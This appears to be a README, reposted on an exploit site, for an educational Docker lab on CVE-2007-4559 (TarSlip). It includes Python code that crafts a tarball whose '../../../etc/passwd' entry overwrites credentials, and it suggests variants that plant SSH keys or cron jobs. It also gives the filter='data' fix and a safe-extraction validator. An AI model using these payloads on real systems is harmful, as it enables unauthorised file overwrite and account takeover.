Exploit for Path Traversal in Python CVE-2007-4559

2026-04-18 | CVSS 9.8
## https://sploitus.com/exploit?id=2C9F6234-51AA-5233-BB11-B19ADC668F01
# CVE-2007-4559 — TarSlip: The 15-Year Directory Traversal

> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.

A self-contained Docker lab that demonstrates **CVE-2007-4559** — the infamous "TarSlip" vulnerability in Python's `tarfile` module — through a concrete, end-to-end attack chain:

1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API — and blocked with one line of code.

---

## The vulnerability

Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.

```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/

resolved path  : /shared/uploads/a1b2c3d4/../../../etc/passwd
               = /etc/passwd   ← system file overwritten
```
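The resolution above can be reproduced with nothing more than path arithmetic. The sketch below is illustrative only: `resolve_entry` is a hypothetical helper, not part of the lab, and it uses `posixpath` so the result is the same on any host OS.

```python
import posixpath

def resolve_entry(extraction_dir: str, entry_name: str) -> str:
    """Return the path a naive extractor would write to for a given entry name."""
    # join() simply concatenates; normpath() then collapses the "../" segments.
    return posixpath.normpath(posixpath.join(extraction_dir, entry_name))

extraction_dir = "/shared/uploads/a1b2c3d4/"

# A benign entry stays inside the session directory.
benign = resolve_entry(extraction_dir, "notes/readme.txt")

# Three "../" segments climb past a1b2c3d4, uploads, and shared to reach "/".
escaped = resolve_entry(extraction_dir, "../../../etc/passwd")

print(benign)
print(escaped)
```

Each `../` cancels one directory of the extraction path, so the number of segments an attacker needs depends on how deep the upload directory sits.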

| Year | Event |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007 – 2022** | Marked "not a security issue" — tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and find **350,000+ repos** calling `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12 — the fix is a single argument |

---

## What the demo shows

The demo runs in three beats, each requiring a keypress to advance.

### Beat 1 — Baseline

- `GET /admin` → **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz` → files land inside the sandbox directory. Everything looks normal.

### Beat 2 — The Exploit

```
Attacker crafts tarslip_passwd.tar.gz
  └─ entry: "../../../etc/passwd"
       content: admin:hacked:1001:...   ← planted password
            │
            ▼
  POST /upload  (multipart file upload)
            │
            ▼
  extractall("/shared/uploads/{uuid}/")
  resolves "../../../etc/passwd" → /etc/passwd   ← CVE-2007-4559
            │
            ▼
  GET /admin   Authorization: Basic admin:hacked
            │
            ▼
  HTTP 200 — "Welcome, admin! You have full admin access."
  flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```

One HTTP POST. No shell. No RCE payload. Just a tar file.

### Beat 3 — The Fix

The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError` — the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.

```python
# Vulnerable — default before Python 3.14
tar.extractall(extraction_dir)

# Fixed — PEP 706 (Python 3.12+)
tar.extractall(extraction_dir, filter='data')
```

One argument. Fifteen years to ship.

---

## Architecture

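Four services are defined across the two Compose files, with three running at a time on an isolated Docker bridge network (`tarslip-net`). The vulnerable and fixed APIs both bind host port 8000, so only one of them is up at once; the diagram shows the vulnerable stack. Nothing reaches the internet.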

```
┌─────────────────────────────────────────────────────────┐
│                    tarslip-net (bridge)                  │
│                                                          │
│  ┌─────────────────┐      ┌──────────────────────────┐  │
│  │  vulnerable-api │      │       file-server        │  │
│  │  python:3.11.3  │      │       nginx:alpine       │  │
│  │  port 8000      │      │       port 8080 (host)   │  │
│  │                 │      │                          │  │
│  │  POST /upload   │      │  Serves /shared over     │  │
│  │  GET  /admin    │      │  HTTP — browse extracts  │  │
│  │  GET  /health   │      │  visually                │  │
│  └────────┬────────┘      └────────────┬─────────────┘  │
│           │  shared-storage volume     │                 │
│           └────────────────────────────┘                 │
│                                                          │
│  ┌─────────────────┐                                     │
│  │    attacker     │                                     │
│  │  python:3.12    │  (no host port — internal only)     │
│  │                 │                                     │
│  │  craft_malicious.py  — generates tarballs             │
│  │  demo.py             — drives the demo                │
│  └─────────────────┘                                     │
└─────────────────────────────────────────────────────────┘
```

| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | — |

The vulnerable and fixed APIs use **identical source code**. The only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.
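The lab's `app.py` is not reproduced in this README, so the following is only a sketch of how such a toggle could work. The helper name `extraction_kwargs` and the exact truthiness rule (`"true"`, case-insensitive) are assumptions; only the `USE_SAFE_EXTRACTION` variable name and the `filter='data'` argument come from the text above.

```python
import os
import tarfile

def extraction_kwargs(env=os.environ) -> dict:
    """Map the USE_SAFE_EXTRACTION setting to keyword arguments for extractall()."""
    # Assumption: the flag counts as enabled only when set to "true".
    safe = env.get("USE_SAFE_EXTRACTION", "").strip().lower() == "true"
    return {"filter": "data"} if safe else {}

def extract_upload(archive_path: str, extraction_dir: str, env=os.environ) -> None:
    """Extract an uploaded archive, passing filter='data' only when the flag is set."""
    with tarfile.open(archive_path) as tar:
        tar.extractall(extraction_dir, **extraction_kwargs(env))
```

Keeping the difference down to one keyword argument is what lets both containers share a single code path.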

---

## Repository layout

```
CVE-2007-4559-lab/
├── run_demo.sh                      ← start here
├── docker-compose.vulnerable.yml
├── docker-compose.fixed.yml
├── vulnerable-api/
│   ├── app.py                       # Flask API: /upload + /admin + /health
│   ├── Dockerfile                   # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
│   └── requirements.txt
├── file-server/
│   ├── Dockerfile
│   └── nginx.conf
└── attacker/
    ├── craft_malicious.py           # generates innocent.tar.gz + tarslip_passwd.tar.gz
    ├── demo.py                      # four-mode CLI driver (craft/baseline/exploit/verify)
    ├── Dockerfile
    └── requirements.txt
```

---

## Prerequisites

- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux** — the shell script uses `bash`
- Ports **8000** and **8080** free on your host

---

## Running the demo

```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```

The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.

### What each pause point covers

| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1 — baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2 — exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3 — verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |

### Running beats individually

If you want to step through manually:

```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit

# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify

# Teardown
docker compose -f docker-compose.fixed.yml down
```

### Visual inspection

While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.

---

## How the `/admin` endpoint works

The API seeds a secret admin password into `/etc/passwd` at image build time:

```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```

`GET /admin` reads this file and checks the second field (password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass` — but after TarSlip overwrites the file with their own version containing `admin:hacked`, they do.

This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write.
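As a rough illustration of the check described above, the sketch below parses a Basic Auth header and compares the supplied password with the second field of the matching passwd line. The function names are hypothetical and the lab's real handler may differ; the file content is passed in as a string so the example never touches a real `/etc/passwd`.

```python
import base64
import hmac

def parse_basic_auth(header: str):
    """Decode 'Basic <base64(user:password)>' into (user, password), or None."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token).decode("utf-8")
    except ValueError:  # covers bad base64 and bad UTF-8
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def password_for(passwd_text: str, username: str):
    """Return the second colon-separated field of the user's line, or None."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == username:
            return fields[1]
    return None

def is_authorized(passwd_text: str, header: str) -> bool:
    """True when the header's password matches the one stored for that user."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    expected = password_for(passwd_text, creds[0])
    if expected is None:
        return False
    return hmac.compare_digest(expected.encode(), creds[1].encode())
```

Because the check trusts whatever the file currently contains, whoever controls the file controls the login, which is the property the demo exercises.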

---

## How the payloads are crafted

`craft_malicious.py` uses Python's own `tarfile` module — the same one that has the bug:

```python
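import io
import tarfile

def _add_entry(tar, name, content):
    info = tarfile.TarInfo(name=name)   # name is the traversal path
    info.size = len(content)            # header size must match the payload length
    tar.addfile(info, io.BytesIO(content))

malicious_passwd_content = b"admin:hacked:1001:...\n"   # remaining fields elided, as in Beat 2

with tarfile.open("tarslip_passwd.tar.gz", "w:gz") as tar:
    # Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
    _add_entry(tar, "../../../etc/passwd", malicious_passwd_content)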
```

No special tools. No binary exploitation. The standard library is both the weapon and the victim.

---

## The fix explained

Python 3.12 introduced `filter=` in PEP 706. The `'data'` filter:

- Rejects entries that resolve outside the destination directory
- Clears setuid, setgid, and sticky bits, plus group/other write permission
- Refuses device files and links (hard or symbolic) that point outside the destination
- Raises `tarfile.OutsideDestinationError` on traversal attempts

```python
# Before (vulnerable — still the default until Python 3.14)
with tarfile.open(path) as tar:
    tar.extractall(dest)

# After (safe)
with tarfile.open(path) as tar:
    tar.extractall(dest, filter='data')
```

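The filter was also backported to security releases of older branches (3.8.17, 3.9.17, 3.10.12, and 3.11.4), and `hasattr(tarfile, 'data_filter')` reports whether it is available. On interpreters without it, such as the lab's 3.11.3 image, validate manually: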

```python
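import os
import tarfile

def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Validate every member first, then extract; raises ValueError on anything unsafe."""
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        # Links and device nodes can redirect later writes, so allow only files and directories.
        if not (member.isfile() or member.isdir()):
            raise ValueError(f"Unsupported member type: {member.name}")
        member_path = os.path.realpath(os.path.join(dest, member.name))
        # commonpath (unlike a prefix test) also accepts an entry that resolves to dest itself.
        if os.path.commonpath([dest, member_path]) != dest:
            raise ValueError(f"Unsafe path: {member.name}")
    tar.extractall(dest)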
```
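One way to support both old and new interpreters is to detect the filter at runtime and fall back to a manual validator such as `safe_extract` above. This is a sketch under that assumption: `extract_untrusted` and its `fallback` parameter are hypothetical names, and the fallback is expected to both validate and extract.

```python
import tarfile

def has_extraction_filters() -> bool:
    """True when this interpreter ships PEP 706 extraction filters."""
    return hasattr(tarfile, "data_filter")

def extract_untrusted(tar: tarfile.TarFile, dest: str, fallback) -> str:
    """Prefer filter='data'; otherwise delegate to a caller-supplied validator."""
    if has_extraction_filters():
        tar.extractall(dest, filter="data")
        return "data-filter"
    # Older interpreter: the fallback must validate members and then extract.
    fallback(tar, dest)
    return "manual-check"
```

Returning which path was taken makes it easy to log or assert on in tests, for example `extract_untrusted(tar, dest, safe_extract)`.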

Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.

---

## Broader impact — ZipSlip

TarSlip is the tar-archive instance of a vulnerability class that appears wherever an extraction API trusts the entry paths stored in an archive:

| Language | Vulnerable API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |

Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.
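The "canonicalize and validate" rule is independent of the archive format. A minimal sketch in Python, using a hypothetical `is_within_directory` helper, might look like this; it checks names only and does not account for symlinks that an archive creates during extraction.

```python
from pathlib import Path

def is_within_directory(base_dir: str, entry_name: str) -> bool:
    """True when entry_name, joined to base_dir and canonicalized, stays under base_dir."""
    base = Path(base_dir).resolve()
    # An absolute entry_name replaces base entirely, so it is rejected below.
    target = (base / entry_name).resolve()
    return target == base or base in target.parents

for name in ("docs/readme.txt", "../../../etc/passwd", "/etc/passwd"):
    print(name, is_within_directory("/shared/uploads/a1b2c3d4", name))
```

Comparing whole path components, rather than string prefixes, avoids accepting a sibling such as `/shared/uploads/a1b2c3d4-evil`.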

---

## Audience variations

### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is "how do we prevent this in our codebase?" — show the PEP 706 migration guide and how to add the check to CI.

### Security audiences
Focus on the Trellix disclosure methodology — how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.

### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets — shows that any writable path is an attack surface.

---

## References

- [NVD — CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706 — Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix — "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker — bpo-21109](https://bugs.python.org/issue21109) (long-running tracker issue on `tarfile` path traversal, opened in 2014; the CVE itself dates to 2007)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)

---

## License

MIT — use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.